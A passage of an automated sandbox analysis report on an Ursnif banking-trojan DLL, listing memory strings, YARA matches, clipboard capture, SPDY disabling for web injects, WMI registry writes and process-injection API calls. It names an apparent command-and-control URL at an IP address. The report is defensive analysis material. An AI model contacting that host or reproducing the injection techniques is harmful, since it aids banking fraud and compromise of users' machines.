Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.4.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.4.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.4.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.4.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: https://185.156.172.54/images/TMwZ54mn/_2B0YUdRavAKwwypVOfrYnt/6W6xbFFdug/RuY3cr5ZWBeuRUS61/qsMNDxm8
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 5fd9d7ec9e7aetar.dll String found in binary or memory: https://sectigo.com/CPS0D
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Contains functionality to read the clipboard data
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100181C0 EntryPoint,DestroyCursor,CreateMetaFileA,CloseFigure,AbortPath,DestroyCursor,GetMapMode,CharUpperW,OpenIcon,CharNextA,GdiGetBatchLimit,GetClipboardOwner,IsGUIThread,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData, 0_2_100181C0
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.457120886.000000000153B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01511ADC GetLastError,NtClose, 0_2_01511ADC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01511A34 GetProcAddress,NtCreateSection,memset, 0_2_01511A34
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015110BA NtMapViewOfSection, 0_2_015110BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015123F5 NtQueryVirtualMemory, 0_2_015123F5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F679B3 NtMapViewOfSection, 0_2_02F679B3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F671B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_02F671B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F67B01 GetProcAddress,NtCreateSection,memset, 0_2_02F67B01
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F6B2FD NtQueryVirtualMemory, 0_2_02F6B2FD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0122B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess, 0_2_0122B780
Source: C:\Windows\explorer.exe Code function: 37_2_03B623A4 NtQueryInformationProcess, 37_2_03B623A4
Source: C:\Windows\explorer.exe Code function: 37_2_03B613A8 NtMapViewOfSection, 37_2_03B613A8
Source: C:\Windows\explorer.exe Code function: 37_2_03B58790 NtCreateSection, 37_2_03B58790
Source: C:\Windows\explorer.exe Code function: 37_2_03B60BE8 NtReadVirtualMemory, 37_2_03B60BE8
Source: C:\Windows\explorer.exe Code function: 37_2_03B52710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 37_2_03B52710
Source: C:\Windows\explorer.exe Code function: 37_2_03B672AC NtWriteVirtualMemory, 37_2_03B672AC
Source: C:\Windows\explorer.exe Code function: 37_2_03B68208 RtlAllocateHeap,NtQueryInformationProcess, 37_2_03B68208
Source: C:\Windows\explorer.exe Code function: 37_2_03B76A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 37_2_03B76A5C
Source: C:\Windows\explorer.exe Code function: 37_2_03B62DC4 NtQueryInformationProcess, 37_2_03B62DC4
Source: C:\Windows\explorer.exe Code function: 37_2_03B710A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_03B710A0
Source: C:\Windows\explorer.exe Code function: 37_2_03B6F0C0 NtAllocateVirtualMemory, 37_2_03B6F0C0
Source: C:\Windows\explorer.exe Code function: 37_2_03B68800 NtQuerySystemInformation, 37_2_03B68800
Source: C:\Windows\explorer.exe Code function: 37_2_03B8A004 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_03B8A004
Source: C:\Windows\System32\control.exe Code function: 38_2_009C10A0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_009C10A0
Source: C:\Windows\System32\control.exe Code function: 38_2_009BF0C0 NtAllocateVirtualMemory, 38_2_009BF0C0
Source: C:\Windows\System32\control.exe Code function: 38_2_009B72AC NtWriteVirtualMemory, 38_2_009B72AC
Source: C:\Windows\System32\control.exe Code function: 38_2_009B8208 NtQueryInformationProcess, 38_2_009B8208
Source: C:\Windows\System32\control.exe Code function: 38_2_009C6A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_009C6A5C
Source: C:\Windows\System32\control.exe Code function: 38_2_009A8790 NtCreateSection, 38_2_009A8790
Source: C:\Windows\System32\control.exe Code function: 38_2_009B13A8 NtMapViewOfSection, 38_2_009B13A8
Source: C:\Windows\System32\control.exe Code function: 38_2_009B23A4 NtQueryInformationProcess, 38_2_009B23A4
Source: C:\Windows\System32\control.exe Code function: 38_2_009B0BE8 NtReadVirtualMemory, 38_2_009B0BE8
Source: C:\Windows\System32\control.exe Code function: 38_2_009A2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_009A2710
Source: C:\Windows\System32\control.exe Code function: 38_2_009DA004 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_009DA004
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015121D4 0_2_015121D4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100014EE 0_2_100014EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100012F1 0_2_100012F1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000155A 0_2_1000155A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100037DC 0_2_100037DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F6B0DC 0_2_02F6B0DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F65920 0_2_02F65920
Source: C:\Windows\explorer.exe Code function: 37_2_03B5E2F0 37_2_03B5E2F0
Source: C:\Windows\explorer.exe Code function: 37_2_03B5F204 37_2_03B5F204
Source: C:\Windows\explorer.exe Code function: 37_2_03B76A5C 37_2_03B76A5C
Source: C:\Windows\explorer.exe Code function: 37_2_03B70180 37_2_03B70180
Source: C:\Windows\explorer.exe Code function: 37_2_03B5BD6C 37_2_03B5BD6C
Source: C:\Windows\explorer.exe Code function: 37_2_03B5F8AC 37_2_03B5F8AC
Source: C:\Windows\explorer.exe Code function: 37_2_03B79494 37_2_03B79494
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C0C0 37_2_03B5C0C0
Source: C:\Windows\explorer.exe Code function: 37_2_03B60C34 37_2_03B60C34
Source: C:\Windows\explorer.exe Code function: 37_2_03B6A054 37_2_03B6A054
Source: C:\Windows\explorer.exe Code function: 37_2_03B6D3A0 37_2_03B6D3A0
Source: C:\Windows\explorer.exe Code function: 37_2_03B57FCC 37_2_03B57FCC
Source: C:\Windows\explorer.exe Code function: 37_2_03B78320 37_2_03B78320
Source: C:\Windows\explorer.exe Code function: 37_2_03B78B18 37_2_03B78B18
Source: C:\Windows\explorer.exe Code function: 37_2_03B52F0C 37_2_03B52F0C
Source: C:\Windows\explorer.exe Code function: 37_2_03B54E94 37_2_03B54E94
Source: C:\Windows\explorer.exe Code function: 37_2_03B74290 37_2_03B74290
Source: C:\Windows\explorer.exe Code function: 37_2_03B5DEF0 37_2_03B5DEF0
Source: C:\Windows\explorer.exe Code function: 37_2_03B51EFC 37_2_03B51EFC
Source: C:\Windows\explorer.exe Code function: 37_2_03B66A34 37_2_03B66A34
Source: C:\Windows\explorer.exe Code function: 37_2_03B7062C 37_2_03B7062C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6B210 37_2_03B6B210
Source: C:\Windows\explorer.exe Code function: 37_2_03B5AA50 37_2_03B5AA50
Source: C:\Windows\explorer.exe Code function: 37_2_03B77A5C 37_2_03B77A5C
Source: C:\Windows\explorer.exe Code function: 37_2_03B5CE44 37_2_03B5CE44
Source: C:\Windows\explorer.exe Code function: 37_2_03B595A8 37_2_03B595A8
Source: C:\Windows\explorer.exe Code function: 37_2_03B619D4 37_2_03B619D4
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C9D0 37_2_03B5C9D0
Source: C:\Windows\explorer.exe Code function: 37_2_03B68D74 37_2_03B68D74
Source: C:\Windows\explorer.exe Code function: 37_2_03B70C88 37_2_03B70C88
Source: C:\Windows\explorer.exe Code function: 37_2_03B560E4 37_2_03B560E4
Source: C:\Windows\explorer.exe Code function: 37_2_03B6DCE4 37_2_03B6DCE4
Source: C:\Windows\explorer.exe Code function: 37_2_03B548E8 37_2_03B548E8
Source: C:\Windows\explorer.exe Code function: 37_2_03B65030 37_2_03B65030
Source: C:\Windows\System32\control.exe Code function: 38_2_009AF8AC 38_2_009AF8AC
Source: C:\Windows\System32\control.exe Code function: 38_2_009AE2F0 38_2_009AE2F0
Source: C:\Windows\System32\control.exe Code function: 38_2_009C6A5C 38_2_009C6A5C
Source: C:\Windows\System32\control.exe Code function: 38_2_009C9494 38_2_009C9494
Source: C:\Windows\System32\control.exe Code function: 38_2_009C0C88 38_2_009C0C88
Source: C:\Windows\System32\control.exe Code function: 38_2_009AC0C0 38_2_009AC0C0
Source: C:\Windows\System32\control.exe Code function: 38_2_009A48E8 38_2_009A48E8
Source: C:\Windows\System32\control.exe Code function: 38_2_009A60E4 38_2_009A60E4
Source: C:\Windows\System32\control.exe Code function: 38_2_009BDCE4 38_2_009BDCE4
Source: C:\Windows\System32\control.exe Code function: 38_2_009B5030 38_2_009B5030
Source: C:\Windows\System32\control.exe Code function: 38_2_009B0C34 38_2_009B0C34
Source: C:\Windows\System32\control.exe Code function: 38_2_009BA054 38_2_009BA054
Source: C:\Windows\System32\control.exe Code function: 38_2_009C0180 38_2_009C0180
Source: C:\Windows\System32\control.exe Code function: 38_2_009A95A8 38_2_009A95A8
Source: C:\Windows\System32\control.exe Code function: 38_2_009AC9D0 38_2_009AC9D0
Source: C:\Windows\System32\control.exe Code function: 38_2_009B19D4 38_2_009B19D4
Source: C:\Windows\System32\control.exe Code function: 38_2_009B8D74 38_2_009B8D74
Source: C:\Windows\System32\control.exe Code function: 38_2_009ABD6C 38_2_009ABD6C
Source: C:\Windows\System32\control.exe Code function: 38_2_009C4290 38_2_009C4290
Source: C:\Windows\System32\control.exe Code function: 38_2_009A4E94 38_2_009A4E94
Source: C:\Windows\System32\control.exe Code function: 38_2_009A1EFC 38_2_009A1EFC
Source: C:\Windows\System32\control.exe Code function: 38_2_009ADEF0 38_2_009ADEF0
Source: C:\Windows\System32\control.exe Code function: 38_2_009BB210 38_2_009BB210
Source: C:\Windows\System32\control.exe Code function: 38_2_009AF204 38_2_009AF204
Source: C:\Windows\System32\control.exe Code function: 38_2_009B6A34 38_2_009B6A34
Source: C:\Windows\System32\control.exe Code function: 38_2_009C062C 38_2_009C062C
Source: C:\Windows\System32\control.exe Code function: 38_2_009C7A5C 38_2_009C7A5C
Source: C:\Windows\System32\control.exe Code function: 38_2_009AAA50 38_2_009AAA50
Source: C:\Windows\System32\control.exe Code function: 38_2_009ACE44 38_2_009ACE44
Source: C:\Windows\System32\control.exe Code function: 38_2_009BD3A0 38_2_009BD3A0
Source: C:\Windows\System32\control.exe Code function: 38_2_009A7FCC 38_2_009A7FCC
Source: C:\Windows\System32\control.exe Code function: 38_2_009C8B18 38_2_009C8B18
Source: C:\Windows\System32\control.exe Code function: 38_2_009A2F0C 38_2_009A2F0C
Source: C:\Windows\System32\control.exe Code function: 38_2_009C8320 38_2_009C8320
PE / OLE file has an invalid certificate
Source: 5fd9d7ec9e7aetar.dll Static PE information: invalid certificate
PE file does not import any functions
Source: lcbc4odh.dll.33.dr Static PE information: No import functions for PE file found
Source: 00wddsye.dll.35.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 5fd9d7ec9e7aetar.dll Binary or memory string: OriginalFilenameSetACL.exe. vs 5fd9d7ec9e7aetar.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe Section loaded: msoert2.dll
Source: C:\Windows\explorer.exe Section loaded: msimg32.dll
Source: 44E8.bin.37.dr Binary string: Boot Device: \Device\HarddiskVolume2
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@43/54@6/4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F656A2 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_02F656A2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CB1D97F9-3FD1-11EB-90E5-ECF4BB570DC9}.dat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{80E0D293-DF59-B25D-69B4-8306AD28679A}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{BC1CCCFF-EB50-4EB1-55B0-4F6259E4F3B6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF40EAD1D3FC8CB615.TMP Jump to behavior
